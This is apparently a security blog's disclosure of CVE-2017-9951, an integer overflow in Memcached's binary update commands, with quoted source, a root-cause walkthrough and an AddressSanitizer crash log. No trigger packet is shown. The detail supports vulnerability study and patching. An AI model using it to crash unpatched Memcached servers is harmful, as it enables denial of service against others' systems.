Security Risk: Low
Exploitation Level: Easy/Remote
Affected Versions: Memcached 1.4.38 and prior versions
Vulnerability: Integer overflow
CVE: CVE-2017-9951

Summary

Memcached is a high-performance, distributed memory object caching system, generic in nature, but originally intended for use in speeding up dynamic web applications by alleviating database load. You can think of it as a short-term memory for your applications.

Memcached has 2 versions of the protocol for saving and retrieving data; ASCII based and binary based one, the binary protocol is optimized for size and each binary command has it’s own representative opcode.

An integer overflow can be triggered by issuing a binary command that adds or replaces an existing key-value pair which leads to remote denial of service of the memcached server by crashing some of the worker threads. Note that the server itself will not crash – Memcached will keep on trying to spawn new worker threads which in turn can be crashed again and again which can potentially lead to killing all workers repeatedly and draining server resources.

The affected commands are: Set, Add, Replace, SetQ, AddQ and ReplaceQ which all call into process_bin_update function.
Any implementation of memcached < 1.4.39 is vulnerable, including the docker hub image that has over 10 Million pulls.

 

The vulnerability was discovered by reviewing the code and the commits (also here) that followed after version 1.4.31 and is in fact a result of an insufficient fix for a year old vulnerability that was assigned CVE-2016-8705.

The generic binary request structure looks like this:


The request header format is:

This packet will trigger the vulnerability and it can be observed under valgrind or AddressSanitizer (ASAN):

Down the rabbit hole

Our journey begins after the server is reading the key that we are trying to add, and ends up in process_bin_update function where the integer overflow happens:

static void process_bin_update(conn *c) {
char *key;
int nkey;  // [a]
int vlen; // [b]
item *it;
protocol_binary_request_set* req = binary_get_request(c);

assert(c != NULL);

key = binary_get_key(c);
nkey = c->binary_header.request.keylen;

/* fix byteorder in the request */
req->message.body.flags = ntohl(req->message.body.flags);
req->message.body.expiration = ntohl(req->message.body.expiration);

vlen = c->binary_header.request.bodylen - (nkey + c->binary_header.request.extlen); [c]

Notice that at nkey [a] and vlen[b] are of type int and bodylen is defined in protocol_binary.h as an unsigned integer:
typedef union {
struct {
uint8_t magic;
uint8_t opcode;
uint16_t keylen;
uint8_t extlen;
uint8_t datatype;
uint16_t reserved;
uint32_t bodylen;
uint32_t opaque;
uint64_t cas;
} request;
uint8_t bytes[24];
} protocol_binary_request_header;

Because of the difference in signedness between bodylen and vlen an integer overflow can occur resulting in a negative value of vlen at [c].
Once we have a negative vlen value the server goes on and tries to allocate the item:

it = item_alloc(key, nkey, req->message.body.flags,
realtime(req->message.body.expiration), vlen+2);

This is the exploitable part of CVE-2016-8705, but this time we can not achieve code execution as the fix was actually implemented inside of item_alloc function, where the arbitrary write could be archived with the help of the negative vlen value.
Now with the fix in place item_alloc returns 0 and the server lands inside of this code:


if (it == 0) {
enum store_item_type status;
if (! item_size_ok(nkey, req->message.body.flags, vlen + 2)) {
write_bin_error(c, PROTOCOL_BINARY_RESPONSE_E2BIG, NULL, vlen);
status = TOO_LARGE;
} else {
out_of_memory(c, "SERVER_ERROR Out of memory allocating item");
/* This error generating method eats the swallow value. Add here. */
c->sbytes = vlen;
status = NO_MEMORY;

The function item_size_ok Returns true if an item will fit in the cache (its size does not exceed
* the maximum for a cache entry.)

So item size is ok the server will set sbytes to be equal to our negative vlen value and this is where we want to get as sbytes is later used as an indicator for leftover data that the server still has to read from the connection.

Let’s peek inside item_size_ok:

bool item_size_ok(const size_t nkey, const int flags, const int nbytes) {
char prefix[40];
uint8_t nsuffix;

size_t ntotal = item_make_header(nkey + 1, flags,nbytes,prefix, &nsuffix);
if (settings.use_cas) {
    ntotal += sizeof(uint64_t);
}

return slabs_clsid(ntotal) != 0;
}

As you can see, as long as slabs_clsid(ntotal) is not 0 – we will get an OK on the item size

But as there are no checks or restrictions here, a negative ntotal will be accepted and a positive default value of 1 will be returned by slabs_clsid – finally bringing us over the item_size_ok check and landing in  c->sbytes = vlen; which now assigns a negative value

At this stage the server will move into conn_swallow state and use our negative sbytes in order to try to read from the socket:

case conn_swallow:
/* we are reading sbytes and throwing them away */
if (c->sbytes == 0) {
conn_set_state(c, conn_new_cmd);
break;
}

/* first check if we have leftovers in the conn_read buffer */
if (c->rbytes > 0) {
int tocopy = c->rbytes > c->sbytes ? c->sbytes : c->rbytes; // [a]
c->sbytes -= tocopy;
c->rcurr += tocopy; // [b]
c->rbytes -= tocopy;
break;
}

As our sbytes is a negative value the condition at [a] will be true and c->sbytes will be assigned to tocopy, after which c-rcurr:

static int try_read_command(conn *c) {
assert(c != NULL);
assert(c->rcurr <= (c->rbuf + c->rsize));
assert(c->rbytes > 0);
….
….
req = (protocol_binary_request_header*)c-&gt;rcurr;
….
….

c->binary_header = *req;
c->binary_header.request.keylen = ntohs(req->request.keylen);
c->binary_header.request.bodylen = ntohl(req->request.bodylen);
c->binary_header.request.cas = ntohll(req->request.cas);

At this point the heap overflow will kick in, here is the confirmation from ASAN:

==19472==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00003ca68 at pc 0x00000043fd92 bp 0x7fcc500fdb30 sp 0x7fcc500fdb20
READ of size 1 at 0x61d00003ca68 thread T2
#0 0x43fd91 in try_read_command /home/da5h/Downloads/memcached-1.4.37/memcached.c:4307
#1 0x43fd91 in drive_machine /home/da5h/Downloads/memcached-1.4.37/memcached.c:4820
#2 0x7fcc53cd1841 in event_persist_closure /home/da5h/Desktop/libevent-2.1.8-stable/event.c:1580
#3 0x7fcc53cd1841 in event_process_active_single_queue /home/da5h/Desktop/libevent-2.1.8-stable/event.c:1639
#4 0x7fcc53cd23ae in event_process_active /home/da5h/Desktop/libevent-2.1.8-stable/event.c:1738
#5 0x7fcc53cd23ae in event_base_loop /home/da5h/Desktop/libevent-2.1.8-stable/event.c:1961
#6 0x4814eb in worker_libevent /home/da5h/Downloads/memcached-1.4.37/thread.c:356
#7 0x7fcc53a996b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
#8 0x7fcc537cf3dc in clone (/lib/x86_64-linux-gnu/libc.so.6+0x1073dc)

0x61d00003ca68 is located 24 bytes to the left of 2048-byte region [0x61d00003ca80,0x61d00003d280)
allocated by thread T2 here:
#0 0x7fcc53f9d602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x442ec1 in conn_new /home/da5h/Downloads/memcached-1.4.37/memcached.c:504

Thread T2 created by T0 here:
#0 0x7fcc53f3b253 in pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x36253)
#1 0x487057 in create_worker /home/da5h/Downloads/memcached-1.4.37/thread.c:282
#2 0x487057 in memcached_thread_init /home/da5h/Downloads/memcached-1.4.37/thread.c:772

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/da5h/Downloads/memcached-1.4.37/memcached.c:4307 try_read_command
Shadow bytes around the buggy address:
0x0c3a7ffff8f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7ffff920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3a7ffff930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c3a7ffff940: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa
0x0c3a7ffff950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3a7ffff990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable:        00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone:    fa
Heap right redzone:   fb
Freed heap region:    fd
Stack left redzone:   f1
Stack mid redzone:    f2
Stack right redzone: f3
Stack partial redzone:   f4
Stack after return:   f5
Stack use after scope:   f8
Global redzone:       f9
Global init order:    f6
Poisoned by user:     f7
Container overflow:   fc
Array cookie:         ac
Intra object redzone: bb
ASan internal:        fe
==19472==ABORTING

Final Thoughts

This vulnerability is a good example on how bugs are found and fixed, and even a better example of why developers shouldn’t rush to patch up things in the fastest possible way without sufficient testing.

Although this vulnerability is the result of an insufficient fix and previously overlooked by the reporter of the earlier vulnerability, the maintainer of memcached responded in a quick and professional manner to the report, and fixed the problem in version 1.4.39.

Stay tuned to our blog and Twitter account to get the latest cloud native security news and alerts like this!

← Back to All Posts Next Post →